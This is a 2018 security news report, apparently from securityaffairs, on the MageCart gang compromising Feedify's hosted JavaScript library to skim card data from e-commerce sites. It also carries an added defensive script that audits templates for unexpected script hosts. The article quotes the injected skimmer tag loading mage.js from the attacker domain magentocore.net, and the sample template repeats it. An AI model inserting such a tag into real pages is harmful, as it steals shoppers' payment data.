Feedify cloud service architecture compromised by MageCart crime gang
17.9.2018 securityaffairs
CyberCrime

MageCart cyber gang compromised the cloud service firm Feedify and stole payment card data from customers of hundreds of e-commerce sites.
The MageCart crime gang is very active in this period: payment card data from customers of hundreds of e-commerce websites may have been stolen following the compromise of the cloud service firm Feedify.

Feedify, which has over 4,000 customers, is a cloud platform that lets those customers engage their own site visitors with tools that target them based on their behavior.

To use the service, Feedify’s customers add a JavaScript snippet to their websites. MageCart compromised the supply chain behind that snippet: the script loads various resources from Feedify’s infrastructure, including a library named “feedbackembad-min-1.0.js,” and it was this library that MageCart tampered with.


Every visitor to a page of a Feedify customer’s e-commerce site therefore loaded the malicious script, which allowed the crooks to siphon personal information and payment card data.

Yonathan Klijnsma (@ydklijnsma), 10:05 PM - Sep 11, 2018:
They've been affected by Magecart since Friday, August 17 2018 @ 16:51:01 GMT as we recorded it.

Quoting Placebo (@Placebo52510486):
Magecart on Feedify. A customer engagement tool. According to their website 4000+ websites use their tooling/code. Fixed today after I notified them. @ydklijnsma @GossiTheDog
The group has been active since at least 2015 and has compromised many e-commerce websites to steal payment card and other sensitive data.

The group injects a skimmer script into the target websites to siphon payment card data: once the attackers have compromised a site, they add a piece of embedded JavaScript to the HTML template. Below is an example of the script dubbed MagentoCore.

<script type="text/javascript" src="hxxps://magentocore.net/mage/mage.js"></script>
This script records keystrokes from customers and sends them to a server controlled by the attacker.
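An added example, not code from the article and not MageCart’s or Feedify’s code, of the page-side check this kind of injection calls for: list every external script a checkout template loads and flag any host that is not on the store’s own allowlist. The allowlisted hosts, the sample template and the first-party name shop.example are assumptions made up for the example; the MagentoCore URL is the one quoted above.

```javascript
// Added example (not from the article): audit an HTML template for script
// includes whose origin is not on the list of hosts we expect to serve script.
// An injected tag like the MagentoCore one above shows up as a finding.

// Assumed allowlist: the store's own host plus the third-party engagement
// script it knowingly embeds. Both names are placeholders for the example.
const EXPECTED_SCRIPT_HOSTS = new Set([
  'shop.example',      // hypothetical first-party host
  'cdn.feedify.net',   // the third-party library the store embeds on purpose
]);

// Pull every <script ... src="..."> out of the HTML. A regex is enough for an
// audit of templates under our own control; it is not a full HTML parser.
function extractScriptSources(html) {
  const re = /<script\b[^>]*\bsrc\s*=\s*(["'])(.*?)\1[^>]*>/gi;
  const sources = [];
  let m;
  while ((m = re.exec(html)) !== null) sources.push(m[2]);
  return sources;
}

// Resolve each src against the page origin (so relative and protocol-relative
// URLs get a hostname) and report the ones whose host is not allowlisted.
function findUnexpectedScripts(html, pageOrigin) {
  const findings = [];
  for (const src of extractScriptSources(html)) {
    let url;
    try {
      url = new URL(src, pageOrigin);
    } catch {
      findings.push({ src, host: null, reason: 'unparseable src' });
      continue;
    }
    if (!EXPECTED_SCRIPT_HOSTS.has(url.hostname)) {
      findings.push({ src, host: url.hostname, reason: 'host not allowlisted' });
    }
  }
  return findings;
}

// Constructed sample template: the first-party bundle, the Feedify embed, and
// the injected MagentoCore tag quoted in the article.
const SAMPLE_TEMPLATE = `
<html><head>
<script src="/static/checkout.js"></script>
<script type="text/javascript" src="https://cdn.feedify.net/getjs/feedbackembad-min-1.0.js"></script>
<script type="text/javascript" src="https://magentocore.net/mage/mage.js"></script>
</head><body>...</body></html>`;

console.log(findUnexpectedScripts(SAMPLE_TEMPLATE, 'https://shop.example'));
```

Run against the sample, the first-party and Feedify scripts pass and only the magentocore.net include is reported. The check is cheap enough to run on every template commit and on the rendered page of a live store; it catches the injected-tag variant of the attack, but not a case like Feedify’s, where the tag is legitimate and the content behind it changed.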

Typically the hackers go after third-party components that, once compromised, give them reach into a large number of websites at once.

According to the security firm RiskIQ, the MageCart group carried out a targeted attack against British Airways and used a customized version of the skimmer script to stay under the radar.

Using the same tactic, MageCart compromised the websites using the Feedify service by injecting its malicious code into a library that the Feedify script served to customers’ websites.

According to the experts from RiskIQ, MageCart hackers might have had access to the Feedify servers for nearly a month.

Once notified of the compromise, Feedify removed the malicious script (Placebo’s tweet above reports the fix on September 11), but apparently the hackers re-infected the library the following day:

Yonathan Klijnsma (@ydklijnsma), 5:22 PM - Sep 12, 2018:
FYI: Feedify is re-infected with Magecart since about an hour ago, exact time of infection is: Wed, 12 Sep 2018 14:16:02 GMT.

URL: hxxps://cdn[.]feedify[.]net/getjs/feedbackembad-min-1.0.js

/cc @Placebo52510486 @GossiTheDog @_feedify
The events demonstrate the MageCart crime gang’s ability to compromise, and re-compromise, the infrastructure of its victims.

In August, security expert Willem de Groot discovered that the MagentoCore skimmer had at that time already infected 7,339 Magento stores.

At the time, a query of the PublicWWW service showed the MagentoCore script deployed on 5,214 domains; the number of compromised websites is still high (4,762) despite the awareness campaign.